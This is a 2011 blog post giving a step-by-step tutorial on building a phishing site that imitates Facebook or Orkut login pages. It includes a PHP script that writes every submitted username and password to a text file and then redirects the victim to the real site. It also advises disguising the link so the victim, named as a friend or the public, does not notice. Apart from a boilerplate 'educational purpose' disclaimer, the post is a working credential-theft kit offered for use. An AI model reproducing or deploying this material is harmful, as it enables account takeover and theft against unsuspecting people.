Sabtu, 30 April 2011

HOW TO CREATE A PHISHING SITE (STEP BY STEP EXPLANATION)





If you know what is meant by a phishing site then go to the process and read how to do it. This tutorial is for the persons who don’t know what a phising site is A phishing site a webpage which looks exactly like the webpage of your orkut or facebook account. But when you enter your login details they will be stored in a file which is accessible to the creator of the site. This is one of the styles of hacking. You will provide the link to your friend and tell him to open it. He will open it and his login details will be stored. It can be directed at general public with misleading links also.

So here is the process of how to do it:
1) Open the site whose webpage you want to make a copy of.
2) If you are using internet explorer then right click and select view source and if you use Mozilla firefox then right click and select view page source.
3) copy the html code to a notepad and find the word action using the shortcut ctrl+f
4) now change the website name there to post.php and save the file as Index.htm
5) now open another notepad and type the following into it:
header(‘Location: type original site name here’);
$handle = fopen(”usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
6) in the location part of the php type the original site name e.g:-www.facebook.com
7) now save the file as post.php
  8) find a free webhosting site which offers php hosting.
My preference goes to www.ripway.com and www.x10hosting.com
9) create free account in them and upload the two files.
10) Now you will get a link from them which looks exactly like the site you wanted to phish. Give that link to your victim but disguise it with a word so that he won’t find it as a duplicate site.
11) There you go. The moment he enters his login details, he will be redirected to the original site which asks him to enter his details again. Then he will be able to login.
12) To see his username and password login in to your webhosting site and open the file usernames.txt.
Please leave a comment if you like this post.
NOTE: THE INFORMATION PROVIDED IN THIS ARTICLE IS ONLY FOR EDUCATIONAL PURPOSE ONLY. THE AUTHOR IS NO WAY RESPONSIBLE FOR ANY DAMAGE DONE BY USING THE ABOVE ARTICLE’S INFORMATION

0 komentar:

Posting Komentar

VISITORS

Flag Counter